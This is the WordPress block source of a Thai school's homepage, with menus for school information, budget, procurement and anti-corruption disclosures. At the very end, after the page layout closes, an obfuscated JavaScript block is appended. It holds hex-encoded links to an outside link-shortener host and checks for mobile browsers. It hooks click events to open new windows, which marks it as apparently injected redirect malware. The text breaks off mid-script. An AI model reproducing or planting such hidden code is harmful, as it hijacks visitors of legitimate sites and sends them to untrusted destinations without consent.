1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\